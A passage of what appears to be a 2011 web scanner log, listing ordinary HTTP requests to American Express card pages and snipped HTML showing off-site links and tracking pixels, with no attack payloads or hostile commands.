id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <div id="defaultbp"> <a href="http://americanexpresscards.tt.omtrdc.net/m2/americanexpresscards/ubox/page?mbox=open_aj_global&ajcc=fuel-hub-big-pitch&mboxPC=1288274258236-662223.17&mboxSession=1288383256872-14407&mboxXDomain=disabled&mboxDefault=http://www201.americanexpress.com/business-credit-cards/business-solutions/acceptpay&mboxURL=http://www201.americanexpress.com/business-credit-cards/business-solutions/overview" onclick="s_objectID="americanexpresscards.tt.omtrdc.net/m2/americanexpresscards/ubox/page?mbox=open_aj_global&ajcc=fue_1";return this.s_oc?this.s_oc(e):true"> <img border="0/" src="http://secure.cmax.americanexpress.com/Internet/Acquisition/US_en/AppContent/SingleJourney/ngaosbn/OAimages/fuel/fuel_home_img/AcceptPay-BigPitch.jpg"> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <!-- end: scripts --> <img height="1" width="1" src="https://www2.tmvtp.com/amex/us/event.php?page=FUEL_NEW_HUB&ref=explinksrc" /> <script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=acqui275;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /business-credit-cards/find-business-credit-cards?inav=menu_cards_sbc_letussuggest HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:58 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742078938948; path=/; expires=Sun, 07-Feb-16 14:07:58 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000-M8TwajTbuNakt8efG9V6B3:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Find Your Bu ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=opengnrl;cat=openm589;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /business-credit-cards/see-all-business-credit-cards?inav=menu_cards_sbc_viewallcards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742086540310; path=/; expires=Sun, 07-Feb-16 14:08:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000_jxDJbjgZOhN9WZPIub3001:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 79480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>All Business Car ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript> <iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=opengnrl;cat=openm589;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /getthecard/?inav=menu_cards_pc_learnmore HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:55 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742075701458; path=/; expires=Sun, 07-Feb-16 14:07:55 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000rVnDb5Ns0e2sA2sW6SNnstM:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl618;ord=1;num=0123456789?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /getthecard/compare-cards/air-travel-reward-cards?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:1&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:31 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000ViUuoja2Sz3mnB-AFuqHw48:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 130499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <scr ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /getthecard/compare-cards/cashback-cards?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:4&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:47 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000HTDkESl6YRpk28YCfUXToey:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 65414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <scr ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /getthecard/compare-cards/hotel-rewards-cards?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:2&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:40 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000Xst8CwUojkbnYuRcmFAHi80:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 102945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <scr ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /getthecard/compare-cards/preferred-seating?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:3&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:44 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000gyLJYoKb8a2HwMfmLJ_WUlm:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 93497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <scr ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" 